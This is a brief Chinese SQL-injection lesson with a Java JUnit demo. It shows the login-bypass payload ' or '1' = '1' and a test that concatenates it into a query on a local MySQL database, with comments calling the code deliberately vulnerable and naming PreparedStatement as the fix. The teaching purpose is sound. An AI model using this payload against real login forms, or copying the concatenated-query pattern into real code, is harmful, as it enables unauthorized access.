注入核心代码: ' or '1' = '1
拼接后,得到恒等式:
select * from tb_user where username ='ahfahfkl' and password = '' or '1' = '1'
查询后会返回所有用户,直接登录成功。当然目前所有实际运营的网站几乎都已修复了这个漏洞。
import org.junit.jupiter.api.Test;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;
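public class JDBC_UserLogin_SqlZhuRu {
    /**
     * Demonstrates why building SQL by string concatenation is unsafe.
     *
     * <p>The {@code pwd} value below is the payload from the notes above. Once it is
     * concatenated into the query text, the WHERE clause ends in
     * {@code and password = '' or '1' = '1'}, which is always true, so the query
     * matches rows of {@code tb_user} regardless of the password and the "login"
     * is reported as successful. The mitigation is to never splice input into SQL
     * text: use {@code PreparedStatement} with {@code ?} placeholders so the driver
     * sends the value as data rather than as part of the statement.
     *
     * <p>Connects to the local MySQL database {@code db1} as {@code root}; the MySQL
     * JDBC driver must be on the classpath. Prints the outcome to stdout.
     *
     * @throws Exception if the driver cannot be loaded or any JDBC call fails
     */
    @Test
    public void testSqlZhuRu() throws Exception {
        // Load the JDBC driver explicitly (JDBC 4+ drivers self-register; kept for older drivers).
        Class.forName("com.mysql.jdbc.Driver");
        String url = "jdbc:mysql://127.0.0.1:3306/db1?useSSL=false";
        String dbUser = "root";
        String dbPassword = "root";

        // Simulated login form values; pwd is the injection payload being demonstrated.
        String name = "ahfahfkl";
        String pwd = "' or '1' = '1";

        // VULNERABLE ON PURPOSE: the form values are spliced into the SQL text.
        // Outside of this demo, use PreparedStatement + "?" parameters instead.
        String sql = "select * from tb_user where username ='" + name + "' and password = '" + pwd + "'";

        // try-with-resources closes rs, statement and connection even when executeQuery
        // throws; the original only closed them on the success path (resource leak).
        try (Connection connection = DriverManager.getConnection(url, dbUser, dbPassword);
             Statement statement = connection.createStatement();
             ResultSet rs = statement.executeQuery(sql)) {
            if (rs.next()) {
                System.out.println("登录成功");
            } else {
                System.out.println("登录失败");
            }
        }
    }
}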